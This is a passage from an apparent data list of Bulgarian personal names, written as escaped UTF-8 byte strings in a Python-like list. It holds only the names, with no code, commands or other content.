\xd0\xa5\xd0\xa3\xd0\x91\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa2\xd0\xa3\xd0\x9d\xd0\x94\xd0\x96\xd0\x90\xd0\x99 \xd0\x9e\xd0\xa1\xd0\x9c\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x95\xd0\x9b\xd0\x93\xd0\x98\xd0\x9d \xd0\xa4\xd0\x98\xd0\x9a\xd0\xa0\xd0\x98 \xd0\xa8\xd0\xa3\xd0\x9a\xd0\xa0\xd0\x98', '\xd0\x9d\xd0\x98\xd0\x93\xd0\xaf\xd0\xa0 \xd0\xa1\xd0\x90\xd0\xa5\xd0\x9b\xd0\x98\xd0\x9c \xd0\x94\xd0\x96\xd0\x90\xd0\xa4\xd0\x95\xd0\xa0', '\xd0\xa0\xd0\x90\xd0\x9c\xd0\x90\xd0\x94\xd0\x90\xd0\x9d \xd0\x91\xd0\x90\xd0\x99\xd0\xa0\xd0\x90\xd0\x9c \xd0\x90\xd0\xa2\xd0\x90\xd0\x9b\xd0\x90\xd0\x99', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x90\xd0\x94\xd0\x95\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x91\xd0\xae\xd0\xa0\xd0\xa5\xd0\x90\xd0\x9d \xd0\x98\xd0\x9b\xd0\x98\xd0\xaf\xd0\x97\xd0\x9e\xd0\x92 \xd0\x90\xd0\x91\xd0\x90\xd0\x97\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x90\xd0\x9d\xd0\x98\xd0\x95\xd0\x9b\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\xa1\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x90 \xd0\x92\xd0\xaa\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 
\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x95\xd0\x9c\xd0\x95\xd0\x9b \xd0\x95\xd0\xa2\xd0\x95\xd0\x9c \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x95\xd0\x93\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x9b\xd0\xa3\xd0\x93\xd0\xa7\xd0\x98\xd0\x95\xd0\x92\xd0\x90-\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x94\xd0\xa3\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9d\xd0\xa3\xd0\x9d\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9b\xd0\x90\xd0\x9d\xd0\x90 \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x90\xd0\x9d\xd0\xa2\xd0\x9e\xd0\x9d \xd0\x9a\xd0\x9e\xd0\x9d\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xa3\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x93\xd0\xae\xd0\x9d\xd0\x90\xd0\x99 \xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d \xd0\xa1\xd0\x95\xd0\xa4\xd0\x95\xd0\xa0', '\xd0\x9a\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa5\xd0\x90\xd0\xa2 \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\xa2\xd0\x90\xd0\x91\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d \xd0\x93\xd0\x9e\xd0\xa1\xd0\x9f\xd0\x9e\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9e\xd0\xa1\xd0\x9f\xd0\x9e\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa1\xd0\x95\xd0\x9d 
\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\x90\xd0\x93\xd0\x90\xd0\xa3\xd0\x97\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x95\xd0\xa1\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x90 \xd0\x96\xd0\x95\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa2\xd0\x90\xd0\x9d\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa7\xd0\x95\xd0\xa0\xd0\x92\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x9d\xd0\x94\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x92\xd0\x95\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\xa7\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xae\xd0\x9b\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\x93\xd0\x95\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92\xd0\x90', '\xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa0\xd0\x98\xd0\xa4 \xd0\xa1\xd0\x90\xd0\x9c\xd0\x98 \xd0\x90\xd0\x93\xd0\xa3\xd0\xa8', '\xd0\x94\xd0\x90\xd0\x9d\xd0\x98\xd0\x95\xd0\x9b\xd0\x90 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 \xd0\x94\xd0\x90\xd0\xa0\xd0\x98\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9f\xd0\xa0\xd0\x9e\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x9c\xd0\xa7\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x9b\xd0\x95\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 
\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x95\xd0\x9b\xd0\x95\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1 \xd0\x9a\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x9e\xd0\x92 \xd0\x93\xd0\xa0\xd0\x9e\xd0\x97\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\xa0 \xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x9d\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92\xd0\x90', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x95\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98\xd0\x95\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x90\xd0\x9d\xd0\xa3\xd0\x95\xd0\x9b\xd0\x90 \xd0\x97\xd0\x94\xd0\xa0\xd0\x90\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\x9f\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xaa\xd0\xa7\xd0\x95\xd0\x97\xd0\x90\xd0\xa0 \xd0\x91\xd0\x9b\xd0\x90\xd0\x93\xd0\x9e\xd0\x92\xd0\x95\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9e\xd0\x92\xd0\xa7\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa2\xd0\x95\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x90 \xd0\xa0\xd0\x90\xd0\x94\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 
\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\xaf\xd0\x92\xd0\x9e\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x9e\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x9e\xd0\x9d\xd0\x98\xd0\x9a\xd0\x90 \xd0\xa5\xd0\x90\xd0\x9d\xd0\xa1 \xd0\x9f\xd0\x90\xd0\x9d\xd0\x90\xd0\x99\xd0\x9e\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x95\xd0\x92\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\x9d\xd0\x98\xd0\xa6\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\x93\xd0\x90\xd0\x94\xd0\x96\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x96\xd0\x95\xd0\x9c\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x93\xd0\xa0\xd0\x9e\xd0\x97\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9a\xd0\x90 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa4\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xaa\xd0\xa7\xd0\x95\xd0\x97\xd0\x90\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9d\xd0\x95\xd0\x97\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\xa2\xd0\x98\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 
\xd0\x9a\xd0\xa3\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x91\xd0\x90\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\x92\xd0\xa0\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa0\xd0\x90\xd0\x94\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x90 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 \xd0\x91\xd0\x9e\xd0\x93\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x94\xd0\x98\xd0\x9b\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9a\xd0\x90\xd0\xa2\xd0\x95\xd0\xa0\xd0\x98\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x99\xd0\x9e\xd0\x90\xd0\x9d\xd0\x90 \xd0\x9c\xd0\x98\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\x9a\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', 
'\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa6\xd0\x98\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x90\xd0\x9d\xd0\x98\xd0\x95\xd0\x9b \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x94\xd0\xa0\xd0\x90\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\x95\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa5\xd0\x9b\xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9b\xd0\x98\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x95\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\xa7\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x99 \xd0\x96\xd0\x95\xd0\x9b\xd0\x95\xd0\x92 \xd0\x96\xd0\x95\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 
\xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x94\xd0\x95\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\xa2\xd0\x92\xd0\x98 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\x95\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d', '\xd0\x9d\xd0\x95\xd0\x94\xd0\xaf\xd0\x9b\xd0\x9a\xd0\x9e \xd0\xa2\xd0\x95\xd0\x9d\xd0\x95\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\xaf\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x90\xd0\x9b\xd0\x9d\xd0\x95\xd0\x92\xd0\x90-\xd0\x9c\xd0\x98\xd0\xa2\xd0\x95\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa5\xd0\x9b\xd0\x95\xd0\x91\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x9f\xd0\x90\xd0\xa1 \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92 \xd0\x9f\xd0\x90\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x95\xd0\xa0\xd0\x94\xd0\x9e\xd0\x90\xd0\x9d \xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c \xd0\x98\xd0\xa1\xd0\x9c\xd0\x90\xd0\x98\xd0\x9b \xd0\x94\xd0\x90\xd0\x9b', '\xd0\x9b\xd0\x98\xd0\x9b\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d 
\xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa2\xd0\xa3\xd0\x9d\xd0\xa7\xd0\x95\xd0\xa0 \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xaa\xd0\xa0\xd0\x94\xd0\x96\xd0\x90\xd0\x9b\xd0\x98\xd0\x95\xd0\x92', '\xd0\x93\xd0\xae\xd0\x9d\xd0\x95\xd0\xa0 \xd0\xa4\xd0\x90\xd0\xa0\xd0\x98\xd0\x97 \xd0\xa1\xd0\x95\xd0\xa0\xd0\x91\xd0\x95\xd0\xa1\xd0\xa2', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\xa0\xd0\x90\xd0\x94\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa1\xd0\x9b\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x9e \xd0\xa2\xd0\x95\xd0\x9d\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', 